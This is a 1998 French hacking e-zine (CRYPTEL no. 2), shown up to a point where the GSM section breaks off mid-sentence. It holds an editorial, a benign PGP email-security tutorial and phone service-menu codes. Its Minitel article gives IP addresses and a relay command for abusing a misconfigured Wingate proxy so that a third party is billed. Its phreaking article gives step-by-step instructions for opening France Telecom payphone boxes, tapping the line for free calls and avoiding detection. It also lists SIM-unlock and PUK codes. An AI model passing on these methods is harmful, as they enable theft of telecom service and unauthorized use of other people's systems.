__ __ _ _ __ ____ __ _ / _)/ )( | )/ \(_ _)/ _)/ )2 ( (_( \ \ /( ()_) )( ( _| (_ \__)\_\_)(_) \_) (_ ) \__)\__) >> 10110101| << e-z-i-n-e u-n-d-e-r-g-r-o-u-n-d l-i-b-e-r-a-l-i-s-t-e EDITION No 2 / Decembre 1998 / © CRYPTEL > staff: Editeur / vatoo Ecrivains \ vatoo [vatoo75@altern.org] \ aaah [Aaah@mail.dotcom.fr] \ ced99 [ced99@club-internet.fr] \ cyberjunk [Snipper@hotmail.com] \ pr0tek [pr0tekti0n@hotmail.com] ________________ >> Avertissement: L' organisation CRYPTEL a écrit ce texte dans le but UNIQUE d' informer les gens. Ces quelques lignes codées par des 1 et des 0 ne sont donc qu' à prendre d' un point de vue éducatif. Ce texte n' est pas illégal, c' est son application qui l' est, alors soyez sérieux, ne le mettez pas en pratique, car vous pourriez être poursuivis en justice et nous ne serions pas responsables de vos actes. L' information n' a jamais tué personne. Les actes, si. __________ >>Sommaire: _________ ________ ____ / article \_______________________/ auteur \_____/ Ko \___ |¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯| | 2.1 Edito vatoo 3 | | 2.2 Minitel gratuit aaah 5 | | 2.3 Phreak cabines FT aaah 5 | | 2.4 Email & securite pr0tek 22 | | 2.5 Secrets of 30 GSM vatoo 25 | | 2.6 Introduction a Win NT cyberjunk 19 | | 2.7 Prefixes nationaux vatoo 3 | | 2.8 Password files aaah 4 | | 2.9 Elephant bleu ced99 4 | | 2.10 GSM a la loupe vatoo 15 | | 2.11 Trashing reports aaah 12 | | 2.12 Paris Underground vatoo 24 | | 2.13 Ze End vatoo ? | |__________________________________________________________| '¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯' ______________ 2.1>>Editorial: Decembre 1998...a l' aube de l' an 2000! Et dire que dans quelques jours, nous allons passer en 1999, numero qui marque les esprits, meme les plus incredules. Comment rester indifferent face a ce que represente le futur passage de millenaire? C' est un changement purement psychologique, mais deja, l' arrivee en 1999 va nous faire prendre conscience que notre societe n' est pas a la hauteur de notre epoque. Les francais vont devoir changer d' etat d' esprit, ne plus rester les conservateurs franchouillards qu' ils ont ete jusqu' a present. Le temps est venu a la vulgarisation des technologies (comme le net, un peu nouveau pour les francais, alors qu' il existe depuis presque 40 ans!), avec un droit a l' information plus important pour le citoyen. La lutte contre le fascisme et l' intolerance vont etre decisives pour l' avenir de notre societe. Si les conditions de vie ne plaisent pas plus aux francais, la montee du FN va continuer jusqu' a ce qu' il soit trop tard pour faire marche arriere. C' est a present qu' il faut reagir, et se battre pour ses ideaux. Soyez pour la liberte d' expression, la tolerance, et montrez-le au quotidien. Il faut se dire que ce n' est pas en attendant la reaction des autres que la situation va changer. Le Nouveau Digital Underground Francais est la pour soutenir cette position, surtout dans les moments les plus delicats. Passons a des choses un peu moins serieuses: la deuxieme edition de notre ezine, que vous tenez entre vos disques durs. Notre equipe a essaye de faire un mag encore plus complet et plus precis pour satisfaire votre soif cannibale de connaissances. Je dirais meme qu' on s' est bien dechires pour vous fournir ce numero. Nous avons essaye de rester originaux, et ne pas remixer des articles deja traites de nombreuses fois. Cela va d' une visite des catacombes parisiennes au phreak de cabines FT(exclu), en passant par les secrets de 30 GSM, ou bien encore le trash d' une agence FT. Vous avez surement remarque que des auteurs sont apparus, comme Le Saint (alias Cyberjunk), ced99 ou pr0tek. En fait ils ont ecrit pour le #2 en tant qu' auteurs ponctuels (mis a part ced), et peuvent apparaitre encore dans les editions a venir, ca ne depend que d' eux. On souhaite sincerement que ce numero vous apporte quelque chose. Nous sommes toujours tres interesses par vos creations (articles, scans de pbx, vmb, passwords, ou autres delires..). On attend aussi vos reactions, vos critiques, vos injures sur ce file, et eventuellement vos remerciements! En tout cas, toute l' equipe de CRYPTEL exige que vous passiez un reveillon du jour de l' an terrible a ne pas vous en remettre pendant 3 jours, si vous voyez ce que je veux dire ;) (¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯) ) Minitel GRATOS ?! ) 2.2 ( Aaah@mail.dotcom.fr ( (_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_) En lisant les newsgroups j'ai trouvé un post assez interressant sur le minitel la technique semble valide et FT est parait il au courant du problème. Si j'ai plus d'infos vous cryptel vous en serez informé : Ça y est, c'est confirmé, on peut avoir le minitel gratuit (communications incluses) grâce à France Telecom Interactive (la boîte qui s'occupe de Wanadoo & compagnie). La démarche est très simple, mais nécessite tout de même du logiciel (UNIX me paraît particulièrement adapté ;) Le principe : FTI permet à ses abonnés d'avoir accès au minitel via Internet moyennant un petit abonnement. L'heureux abonné, quand il se connecte au serveur web de wanadoo (www.wanadoo.fr ) voit alors apparaître une rubrique Minitel, et tous les frais normalement reversés au prestataire de service seront débités sur une petite note qui viendra avec la facture Wanadoo pour l'abonnement à Internet. Hum, mais comment cela marche-t-il? Pourquoi certains ont-ils cette rubrique Minitel et pas d'autres? Le serveur Web wanadoo "sait" quelles sont les adresses IP pouvant accéder à un service, et lesquelles n'y ont pas droit. Là où ça devient intéressant, c'est que certaines boîtes, trop heureuses d'avoir le Turbowanadoo (le nom de la formule ADSL "internet rapide"), veulent pouvoir en profiter depuis tout le réseau local. Et, sur le conseil de FTI (j'insiste sur ce point), elles installent Wingate (les techniciens de chez FTI connaissent mal Linux, de leur propre aveu, et Wingate a le mérite d'être bon marché). Préparez les mouchoirs, car par défaut (et les valeurs par défaut ne sont pas changées dans 90% des cas), Wingate offre un service de redirection telnet absolument merveilleux. Pour s'en convaincre, essayez de faire un petit "telnet 193.252.178.17". A l'invite Wingate, tapez (par exemple) "nephtys.lip6.fr 23". Nous sommes alors connectés au service ftp de jussieu, mais en passant par le Wingate. Jussieu a l'impression que c'est la machine hébergeant le Wingate qui appelle. Bien. Le proxy http des ADSL est 193.252.178.5, port 8888. Il reste donc à écrire un petit programme qui, recevant une connexion sur le port (mettons) 3000, va contacter 193.252.178.17, et entrer la chaîne de caractères "193.252.178.5 8888" et ensuite, se contenter de faire la FIFO entre le flux de la connexion entrante sur le port 3000 et le flux de la connexion sortante vers le Wingate. Je suggère l'utilisation des outils "hose" et "faucet", qui redirigent des sockets TCP/IP vers les entrées/sorties standard. La ligne à taper ressemblera à "hose 3000 -c sh faucet 193.252.178.17 (echo 193.252.178.5 8888 ) -slave -in -out"... bon je n'ai pas mes manpages sous la main, c'est assez proche. On lance cette commande sur une bécane (disons toto). Ensuite, dans votre brouteur favori, à la ligne "proxy", mettez l'adresse toto, port 3000. Et zou. Maintenant, vous accédez à Internet, mais exactement comme si vous étiez sur la machine hébergeant le Winproxy. Le proxy de chez FTI croira que l'appel vient de la bécane du Winproxy, et autorisera donc l'accès au minitel. Bon, le seul "hic" c'est que si ça se trouve, je vous ai donné l'adresse d'un Winproxy qui n'a pas pris l'option Minitel. Qui sait? En tout cas, la technique ne se restreint pas aux lignes ADSL, les accès PPP standard peuvent eux aussi être des cibles. -=- Aaah@mail.dotcom.fr (¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯) ) Phreak cabine FT ) 2.3 ( Aaah@mail.dotcom.fr ( (_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_) Mardi 14 Octobre je suis dans une cabine téléphonique entrain de téléphoner (non sans blagues ? ;-) mes clés tombent par terre, je m'accroupis pour les ramasser et là au surprise je remarque le jackpot ---------------------------------- | | | | | | | */Voir Photo cabine.jpg*/ | | | | | | | ---------------------------------- Et oui il est là :-) tout bête et sous nos yeux. C'est une boitier en fer fermé par 2 points : un en haut et un en bas. Pour ouvrir ce boitier 2 manieres s'ouvrent à toi : * Tu es un bourrin, prenez une pince CROCO et essayer de forcer * Tu fais dans la finesse et le raffinement, tu achetes une clé passe EDF/GDF attention ce type de clé ne se trouve que dans les bonnes quincailleries (70 frs environ) inutile de te pointer chez CASTORAMA ou autres et demander ce type de clé ... Voilà à quoi ça ressemble ---------------------------------- | | | | | | | */Voir Photo cle.jpg*/ | | | | | | | ---------------------------------- Moteur.... ACTION ! Voilà maintenant comment je te conseille de procéder. Prends un sac à dos et met z'y un téléphone tout bete avec sa prise dénudé (cad vous virez l'embout il ne faut garder que le fil) un petit tournevis plat, la pince croco ou le passe EDF et partez en quête d'un cabine FT isolé (pas sur les champs élysées). Une fois dedans tu ouvres la boite (tous tes instruments sont cachés dans le sac à tes pieds) et voilà ce que tu trouves ---------------------------------- | | | | | | | */Voir Photo boitier.jpg*/ | | | | | | | ---------------------------------- La première chose que tu fais tu coupes le disjoncteur comme ça la lumière de la cabine sera éteinte tu seras plus au calme pour opérer et moins exposer aux regards. Ensuite la partie qui nous interresse c'est celle avec les fils de plusieurs couleurs raccordée a plusieurs bouts rouges. A partir de là tu es un grand garçon tu prends ton téléphone, ton tournevis et tu fous les fils de ta ligne tel dans ce de la cabine. Respecte bien les couleurs. Une fois fait bah BINGO tu as un tel gratos raccordé a une ligne France Telecom tu détournes une grosse boîte plutôt qu'un pauvre particulier c'est bien mieux. Un autre débouché s'ouvre à toi tu fous une black box et on t'appelle gratos sur une ligne propre à FT donc tu t'en fous des moins de 4 min puisque meme si les commutateurs reperent la couille ils vont surveiller leur propre ligne :-) lol. Quelques remarques en VRAC : **************************** @ Le contenu des boitiers varie celon le type de cabine. Tu peux tomber sur un type de boitier avec un cache pot gris qui protège le raccordement pour l'ouvrir 2 solutions : tu l'arraches (mais ça craint un peu ...) tu essayes de déviser la vis qui est en fait un minuscule point, pour ça tu prends une pointe de clou tu enfonces bien et tu dévises ... NB: Ce type de boitier est quand meme rare. @ Changer régulièrement de cabine on ne sait jamais @ Pour savoir si quelqu'un a ouvert le boitier suite à votre passage mettez avant de partir un petit bout de scotch sur la fente du boitier comme ça si a votre prochain passage il n'y est plus c'est que quelqu'un est passé par là ... -=- Si quelqu'un fait du lock picking, possede des passes france telecom (cabine, répartiteur, etc...) je suis TRES interressé mailez-moi Aaah@mail.dotcom.fr On compte sur vous car on va pas tout faire nous même, participez c'est cool et on est ouvert à toutes vos propositions. (¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯) ) Email & securite ) 2.4 ( pr0tekti0n@hotmail.com ( (_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_) Ce texte est réservé aux personne ayant de grandes connaissances dans le domaine "Internet". Introduction Avec l'utilisation toujours croissante du courrier électronique (E-Mail) comme mode de com- munication sur Internet ainsi que d'autres services, la sécurité de ce type de courrier devient de plus en plus importante. De nombreux utilisateurs se posent des questions telles que: Q: Peux-on intercepter le courrier électronique ? R: Oui, l' E-mail n'est pas sur. Il est possible d'intercepter des messages éléctroniques. Q: Peux-on envoyer du courrier électronique sous un faux nom ? R: Oui, toute personne peux masquer son identité sur le Net. Internet et les services de courrier électronique que l'on peux y trouver ne sont pas surs! A travers ce document, vous pourrez découvrir pourquoi les services mail ne sont pas surs et comment y remédier. 1) Les E-Mail privés. Imaginons que vous vous serviez du courrier électronique pour envoyer des messages dans une entreprise. Il se pourait qu'au cours de cette courte correspondance, vous échangiez des détails intimes (je sais pas moi, une déclaration d'amour :) ). Votre employeur n'aurait aucune difficulté à les lire... Tenez-vous réellement à ce que votre employeur soit parfaitement au courrant de votre vie privée? Si c'est non (enfin j'espere), il est nécessaire que vous protégiez vos lettres des regards indiscrets. 2) Probleme de sécurité. Les informations transmises par courrier électronique sur Internet le sont en texte clair. Ces textes sont stockés sur n'importe quel ordinateur Internet. Ils sont tenus à la disposition du destinataire pour qu'il les recoive sur simple demande. Voila pourquoi les personnes indiscretes disposent de multiples occasions pour lire les messages d'autres utilisataires. En fait, ces "voyeurs" doivent accéder à des parties déterminées sur un réseau: - Le courrier électronique est la plupart du temps transmis via le SMTP (simple mail transfert protocol). Lors de cette transmission, des paquets de données sont envoyées sur un réseau (Internet). Tres souvent, l' E-Mail n'est pas directement transmis au destinataire mais sauvegardé temporairement. Votre E-Mail restera un certains temps sur un serveur, en clair! C'est bien sur à ce moment là que les messages peuvent etre lus et copier par des responsables du serveur ou par des hackers. On pourrait se demander alors si des messages sont lus sur Internet et combien... 3) Identification. Bien que tous les E-Mail disposent d'une adresse d'expéditeur, cette information n'est pas fiable! Il est facile de s'amuser à envoyer des messages sous un faux nom (ceci est expliqué dans de nombreux zine de hacking tels Frhack, allez sur www.multimania.com/gripsou/ ). Suivre des messages reste possible jusqu'à un certain point. Quand une communication est transmise via divers ordinateurs, c'est à peine si l'on sait réellement d'ou elle vient à l'arrivée. Il est donc presque impossible de distinguer si un E-Mail est, dans l'état présent, un original ou ce que l'on pourrait appeler "falsification". 4) Codage d' E-Mail. Il existe de nombreux systemes de codage qui permettent, jusqu'à un certain point, de garantir fiabilité et authenticité. En fait, aucun programme ne peut à ce jour garantir 100 % de sécurité. Dans le cas le plus simple, l'expéditeur et le destinataire s'accordent sur une "clé" déterminée. De tels procédés que si vous disposez d'un moyen de communication sur pour vous mettre d'accord sur une clé (ne faite pas ca sur IRC), et notre bon vieux téléphone n'est pas plus sur qu'une lettre... 5) Systeme à clé publique. Puisqu'il est rare de trouver une voie de communication sure, d'autre procedés de codage permettant la transmition de la fameuse clé sont tres souvent utilisés de nos jours. Chaque utilisateur crée deux clés: La premiere est communiquée de facon "publique". Grace à cette clé toutes les autres personnes chiffrent le courrier destiné à un correspondant. Ce n'est qu'avec la seconde clé perso que le correspondant pourra déchiffrer son courrier: C'est la raison pour laquelle cette clé personnelle doit etre secrete. Voici un shema, je ne suis pas tres fort en dessin... |------------| | Expéditeur |________________________________________________ -------------- |----------- | |Destinataire| | -------------- ------------- _________________________________________________| | Fichier | | | ------------- CLE | | | | | | | | | | ------------ | | | Envois |________| | ------------ | | | | ---------- ---------- | |___________________|Internet|_____| Envois| __________________| ---------- ---------- 6) PGP PGP- Pretty Good Privacy est le systeme à clé publique le plus répendu. Il permet: - De coder des lettres. - De les signer électroniquement. Une signature életronique garantit qu'un courrier a réellement été rédigé par une personne déterminée. Pour vérifier l'authenticité d'une signature, le destinataire utilise pour le décodage la clé publique. Si le déchiffrage du courier ne peux etre effectué; cela signifie que le message a été manipulé. 7) PGP suite A partir d'un message que l'on aura signé, on crée un "extrait" ayant les caractéristiques de ce message. Cet "extrait" est ensuite codé à l'aide de la clé et transmis avec le courrier si le destinataire veut vérifier l'authenticité de la signature, il doit déchiffrer l'extrait codé au moyen de la clé publique de l'expéditeur et doit créer un autre extrait (et oui...) du courrier lisible. Si les deux extraits se recoupent, l'authenticité du courrier et démontrée. Cette methode, disponible dans PGP (le logiciel), permet aux utilisateurs ne possédant pas PGP (oui et ils ne sont pas rares :( ... )de lire des courriers signés. 8) Clé PGP. Bien que les possibilités de PGP présentées ici nous permettent déjà de coder et de signer des messages, d'autres questions se posent. La premiere concerne la maniere dont une personne peut faire parvenir un message chiffré à un autre utilisateur avec lequel elle n'a encore aucun contact... il ne faut pas oublier que la clé doit rester secrete... Prennons un exemple: Une personne A boudrait communiquer avec une peronne B qu'il ne connait pas encore. Si A voulait communiquer avec B, il lui demanderait d'abord sa clé publique. Et si une personne C pouvait intercepter ce message et envoyer à la place de B, une réponse avec une fausse clé, C serait alors le seul à pouvoir lire ces lettre. A penserait communiquer avec B alors qu'elle communiquerait avec C... Comment peut on alors reduire cette possibilité d'aggression ? 9) Serveur de Clé. ______________ ______________ _______________ | | | | | | | Personne A | | Personne B | | Personne C | |____________| |____________| |_____________| | | | | | | | | | _______|__________ | ___| | | _______|___________ _______|___________ | Clé publique | | | | | |_________________| | Clé publique | | Utilisation de | | |_________________| | la clé de A | | | |_________________| | _______________________| | |___________| | _______|__________ | | | _______|__________ | Acces Internet | | | |________________| | Acces Internet | | |________________| | | | | | | _______|__________ | | | |______________________________________| | | Serveur Clé | | |________________|_________________________________________________| | | | Clé publique | |_________________| Les serveurs de clés sont des ordinateurs d'acces public, qui recuillent des clés publiques et qui les envoient sur demande (sympas non ?). Toute personne peut donc y trouver des clés publiques des autres utilisateurs (seulement si ils sont enregistrés). Les serveurs de clés pourraient pour etre pris en otage par des hackers, ne l'oublions pas... 10) La "chaine" de confiance. Le principe sur lequel elle est fondée est le suivant: des personnes qui se connaissent ou bien, qui sont sure de l'existence réelle de l'autre, signent leur clés publiques. ______________ ______________ | | Confiance | | | Personne A |-----------------><------------------| Personne B | |____________| :) |____________| | | | | | | ______|_______ ________|______ | | ________________ | | | Clé privée |___________| |_______| Clé publique | |____________| | Logiciel PGP | |______________| |______________| La signature d'une clé correspond à celle d'un message. Si B désire signer la clé publique de A, alors il la code avec sa propre clé privée. Une chaine de confiance est crée quand de nombreux utilisateurs PGP signent entre eux des clés publiques. 11) "Empreintes digitales". Toute clé publique PGP sera clairement marquée d'une "empreinte digitale". Une telle empreinte est aussi unique que chaque clé. Elle permet d'attribuer de maniere fiable une clé PGP à une personne. Par exemple, si une personne vous transmet son empreinte digitale, vous serez certain que la clé est bien la sienne. Il faut bien sur que la personne puisse vous envoyer ses empreintes digitales :) ... 12) Sécurité avec PGP. La fiabilité de codage tel que PGP repose sur l'importance des moyens que devrait employer un agresseur pour calculer la clé privée. En effet il existe des "cracker PGP", vous pourrez vous en procurer tres certainement sur http://neworder.box.sk Sachez qu'il aura fallu 8 mois à une organisation pour cracker une telle clé... Ceci devrez vous donnez une idée des moyens qu'il faudrait utiliser pour casser une clé... 13) Logiciels PGP (enfin!). Il existe différentes versions de PGP: - Des versions non commerciales pour un usage aux Etats-Unis et le Canada UNIQUEMENT. - Des versions commerciales pour les E-U et le Canada. - Des versions internationnales non commerciales. L'utilisation de PGP est à priori illégale car: - L'un des deux procédés de cryptographie employé dans PGP, à savoir RSA, ne peux etre utiliser qu'aux Etats-Unis. - En Europe, l'usage non commercial de PGP est normalement possible puisque le code source RSA a été exporté illégalement des Etats-Unis. 14) Installation de PGP sous DOS! PGP est autant un programme exécutable dispo pour de nombreux sytemes en source C. Si vous téléchagez un programme PGP, vous aurez les fichiers suivants: ______________________________________________________________________________________________ | | | | Nom du fichier | Contenu du fichier | |_________________|__________________________________________________________________________| | | | | pgp.exe | Programme exécutable | |_________________|__________________________________________________________________________| | | | | config.txt | Fichier de configuration pour PGP | |_________________|__________________________________________________________________________| | | | | setup.doc | Remarques sur la config de PGP | |_________________|__________________________________________________________________________| | | | | pgpdoc1.txt | La doc officielle de PGP | |_________________|__________________________________________________________________________| Lisez premierement toutes les infos des fichiers txt et doc. Ajoutez ensuites ces lignes dans votre fichier autoexec.bat: SET PGPPATH=C:le_rep_ou_vous_avez_mis_PGP SET PATH=C:le_rep_ou_vous_avez_mis_PGP;%PATH% SET TZ=MET-1DST TZ correspond à Time Zone. Info sur le config.txt Dans le tableau suivant, vous trouverez les parametres importants: ______________________________________________________________________________________________ | | | | Parametre | Remarque | |______________________|_____________________________________________________________________| | | | | MyName = "Dupond" | Vous devez bien sur mettre votre nom | |______________________|_____________________________________________________________________| | | | | Language = fr | Langue à choisir | |______________________|_____________________________________________________________________| | | | | Armor = on | Activer le PGP pour coder vos e-mail | |______________________|_____________________________________________________________________| Si vous désirez utiliser PGP sur un autre syteme, lisez bien le CONFIG.TXT. 15) PGP "Keyrings". PGP utilise deux fichiers pour la mémorisation des clés: pubring.pgp et secring.pgp Il inscrit les clés publiques de vos correspondants dans le pubring.pgp . Ce fichier n'est pas "sensible". En revanche le secring.pgp est TRES important puisque c'est dedant qu'est inscrite votre clé privée! Mettez donc plutot ce fichier sur disquette que vous conserverez en lieu sur. Vous devez aussi protéger le fichier randseed.bin qui est aussi important. Des que vous aurez paramétré PGP et protégé vos petits fichiers, vous pourrez commencer à utiliser PGP. 16) Déduter. Q: Comment créer une clé personnelle ? R: tapez: "pgp -kg" le programme vous demandera aussi la longeur de la clé: Pick your RSA key size: 1) 512 bits- Low commercial grade, fast but less secure 2) 768 bits- High commercial grade, medium fast, medium speed, good security 3) 1024 bites- "Military" grade, slow, highest security Choose 1, 2 or 3 enter desired number of bits: Je vous conseille de prendre le 2), une clé normale, bien que le 1) soit suffisant. Un identificateur de clé vous sera demandé: You need a user ID for your public key. The desired form for this user ID is your name, fallowed by your E-mail adress enclosed in ngle brackets, if you have an E-mail adress. For example: Daniel, Dupond .dupond@cool.fr Enter a user ID for your public key: Et maintenant le mot de passe: You need a pass phrase to protect your RSA secret key. Your pass phrase can be any sentence or phrase and may have many words, spaces, punctuation, or any other printable characters. Enter your phrase here: ATTENTION: Ce mot de passe est tres important pour la protection de votre clé! Apres le mot de passe on vous demande de tapez n'importe quoi: We need to generate 968 random bits. This is done by measuring the time intervals between your keystrokes. Please enter some random text on your keyboard until you hear the beep: Vous avec maintenant créer votre clé, entrez ceci pour avoir des infos sur votre clé: "pgp -kvvc" Vous obtiendrez: Key ring:"pubring.pgp" Type Byte/KeyID Date UserID pub 1024/DDB189E1 1998/12/24 Test-Key for Daniel Dupond Key fingerprint = 54 6D C8 D4 98 F9 A3 55 55 AE 1A 69 sig DDB189E1 Test-Key for Daniel Dupond 1 matching found 17) Comment crypter et décrypter des messages. Créez d'abord le fichier que vous voulez crypter. Ex: test.txt Pour le codage tapez: "pgp -eat test.txt" Vous obtiendrez un fichier test.asc Pour le décryptage tapez: "pgp -d test.asc" 18) Les autres commandes PGP. ______________________________________________________________________________________________ | | | | Fonction PGP | Commande | |______________________|_____________________________________________________________________| | | | | Codage d'un texte | pgp -e{fichier texte} {ID du destinataire} | | avec la clé du dest. | | |______________________|_____________________________________________________________________| | | | | Signature | pgp -s{fichier texte} [-u {votre ID}] | |______________________|_____________________________________________________________________| | | | | Décodage d'un texte | pgp {fichier codé} [-o {fichier texte lisible}] | | avec examen de la | | | signature | | |______________________|_____________________________________________________________________| 19) Source PGP et sites Internet Serveur officiel: ftp://ftp.pgp.net/pub/pgp Bon site en anglais bien sur: http://www.pgp.com Et bien sur en fancais: http://www.yahoo.fr/Informatique_et_multimedia/Securite_et_cryptage/Pretty_Good_Privacy__PGP_/ 20) Fin !!! Voila c'est tout, si vous désirez plus d'information ou de l'aide, n'hésitez pas à m'envoyer un mail! |Pr0teK| (¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯) ) Secrets of 30 GSM ) 2.5 ( vatoo ( (_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_) ______________________ Alcatel One Touch Easy Entrez 000000 et pressez *. Le menu secret apparait. TRACES Menu d' indicateurs de canaux ARRETS - ? VIDER ARRETS Pressez OK et le cell repond: 'This action is executed!' CTRL CHARGE Montre la tension du chargeur et de la batterie. DAMIER affiche le test. Le Master Code pour le "MENU Code" et "Prod. code" de l' Alcatel One Touch Easy est 25228353. La plupart des telephones ALCATEL sont 'SIM Locked', ils ne peuvent donc etre utilises qu' avec une certaine tonalite. Ca ne peut etre desactive qu' en obtenant le code special par Alcatel, ou par votre fournisseur d' acces. Il y a une rumeur komme koi un programme permettant de calculer le code a partir de l' IMEI, trainerait sur le net ;) IMEI: 3300 1453 1139 420 Lorsqu' un cell est active avec une carte, ca donne: "PRODUCT CODE" "VAL. => OK" Puis on entre 025121992, OK "ENTER SPECIAL CODE" **05* comme avec Motorola "UNBLOCKING" " PUK ? " 10608CC2*. Les 2 suivants fonctionnent aussi: 906081C2* 15900807* "UNBLOCKING" " PIN ? " 0000* "UNBLOCKING" "PIN AGAIN " 0000# ____________ ERICSSON 198 *#06# pour voir le numero IMEI ________________ ERICSSON 218/337 *#06# pour voir le numero IMEI -> * <- <- * <- * CLR pour voir la version du software. <- * * <- Pour activer la localisation de l' operateur (a utiliser avec precaution). Il y a 5 essais pour y parvenir. Au dernier essai, le telephone beep pour avertir ke c' est le dernier essai..Un mauvais code vous fait sortir du menu, et vous aurez 'Not allowed' inscrit sur le cadran. Un mode de test secret est accessible sir le GH337. Il y a deux methodes: > * < < * > * montre la version du soft, comme 940810 1310 > * < < * < * montre la version du soft, comme 951024 1054 Apres etre entre dans ce mode, vous pouvez vous ballader avec les fleches < et > dans le menu. Chaque menu est different e fonction du type du software. Commandes pour la version 940810 1310 : TEXT CHECK - Montre 254 messages dans le langage courant INIT EEPROM MMI - Initialise la configuration de l' utilisateur Pour les versions plus recentes: FLASH - Redemarre le telephone au moment ou l' on entre le numero de PIN. Commandes pour la version 950626 1405 : CXC (numero) - Le numero de production du soft. Le GH337/GF337 est toujours "CXC 125 005" PRG - Indication pour la programmation ________________ ERICSSON 318/388 *#06# pour voir le numero IMEI -> * <- <- * <- * CLR pour voir la version du software. Pinout du GA628: 1: Chargeur. 2: Entree Serie. 3: GND 4: Sortie Serie. 5: Sortie +5V ? Sources au-dessus de 100 mA. 6: Entree Digitale. 7: Sortie Digitale. Haute lors de l' appel. 8: Permet le micro et l' ecouteur externes, a connecter a un GND. 9: GND 10: Permet le micro et l' ecouteur externes, a connecter a un GND. 11: Microphone externe. 12: Haut-parleur externe, tres petit signal (10 mV). Commandes d' Edition AT+GMI Identification du fabricant AT+GMO Identification du modele AT+GMR Identification de la derniere revision AT+GMM ATDxxx; Appeler le numero xxx ATH Raccrocher le cell AT+CFUN=? Definir les niveaux de fonctionnalite dans l' ordre de consommation d' energie. AT+CBC Voir le niveau de la batterie. Caracteres SMS b7 0 0 0 0 1 1 1 1 b6 0 0 1 1 0 0 1 1 b5 0 1 0 1 0 1 0 1 b4 b3 b2 b1 0 1 2 3 4 5 6 7 0 0 0 0 0 SP D SP 0 @ P ¿ p 0 0 0 1 1 £ SP ! 1 A Q a q 0 0 1 0 2 $ F " 2 B R b r 0 0 1 1 3 ¥ G # 3 C S c s 0 1 0 0 4 è L $ 4 D T d t 0 1 0 1 5 é W % 5 E U e u 0 1 1 0 6 ù P & 6 F V f v 0 1 1 1 7 ì Y ' 7 G W g w 1 0 0 0 8 ò S ( 8 H X h x 1 0 0 1 9 Ç Q ) 9 I Y i y 1 0 1 0 10 LF X * : J Z j z 1 0 1 1 11 Ø SP + ; K Ä k ä 1 1 0 0 12 ø Æ , < L Ö l ö 1 1 0 1 13 CR æ - = M Ñ m ñ 1 1 1 0 14 Å ß . > N Ü n ü 1 1 1 1 15 å É / ? O § o à Notes: SP Espace LF Line feed CR Carriage return Menus caches Allez dans 'MissedCall' Pressez la fleche -> pendant une sec ou 2 Le Menu d' options s' affiche Choisissez 'Yes'. Essayez de taper ca: >*<<*<* ou < est la fleche gauche et > la fleche droite ______________ ERICSSON GA628 *#06# pour voir le numero IMEI -> * <- <- * <- * pour voir la version du soft -> * <- <- * <- * -> pour lire tous les textes programmes < * * < pour voir le status du reseau (attendre 3 s) 0 # pour appeler le dernier numero compose * # 0 0 0 0 # pour initialiser le menu en anglais Pour voir le niveau de la batterie quand le cell est eteint, pressez rapidement on/off. Pour voir les menus supplementaires (sur les versions les + anciennes), allez dans les appels non-aboutis, empty directory, pressez et maintenez la touche flechee droite, et choisissez le type de menu. Pour voir les menus supplementaires (sur les versions les + recentes), allez dans READ, empty directory, pressez et maintenez le touche flechee gauche, et choisissez le type de menu. Pour editer le book de votre cell, allez dans le menu supplementaire, et choisissez "EditPh.Bk". Comment utiliser le menu - (dans les menus supplementaires) Choisissez 'Yes' puis on va vous demander - EditMenus? -, choisissez 'Yes' Si le menu clignote, il n' est pas en marche. S' il ne clignote pas, il est en service. Vous pouvez le mettre en service ou non en choisissant 'Yes'. Lorsque vous mettez en place un menu, vous pouvez choisir sa position. Lorsqu' il demande l' accord, choisissez 'Non', et si la fleche est -> , il dit la position par la fleche droite, vous pouvez la changer en pressant '*', ainsi vous instaurez la place du menu en donnant le numero de la place du menu comme ca: si votre celle inscrit "Store->2", le menu ke vous avez selectionne reste sur la deuxieme fleche a droite! Lorsque tout est fait, pressez 'No', et si vous voulez changer quelque chose, pressez 'Yes'. ____________________________ Ericsson GH688, GH788, GH768. Codes *#06# pour obtenir le numéro IMEI (International Mobile Equipment Identity) *#0000# pour remettre le language en Anglais >*<<*<* pour obtenir les informations internes au téléphone CXC125065 - Numéro de série PRG 970715 1515 - Version du logiciel >*<<*<*> YES vérifier les chaines de texte du téléphone (1) >*<<*<*>> YES vérifier les chaines de texte du téléphone (n) Le menu de vérouillage du fournisseur d'accès (Service Provider (SP)) est utilisé pour vérouiller le téléphone sur la carte SIM de votre SP. Une fois que le téléphone est vérouillé sur un SP, si vous insérez la carte SIM d'un SP différent, le téléphone n'acceptera pas la carte. Le téléphone peut cependant accepter une autre carte SIM du même SP. Pour activer / désactiver ce verrou, il faut un code special qui n'est pas disponible à l'utilisateur final ;) Comment activer le menu de vérouillage SP. <**< vérouiller le réseau ? si vous appuyez sur YES, vous avez 5 essais pour entrer NCK. <**<< vérouiller le sous réseau ? si vous appuyez sur YES, vous avez 5 essais pour entrer NSCK. Attention : en faisant ceci, votre téléphone peut se vérouiller sur le réseau d'un SP. Si un code invalide est entré 5 fois, le téléphone sort du menu. Après, le menu de vérouillage ne sera plus accessible. Un 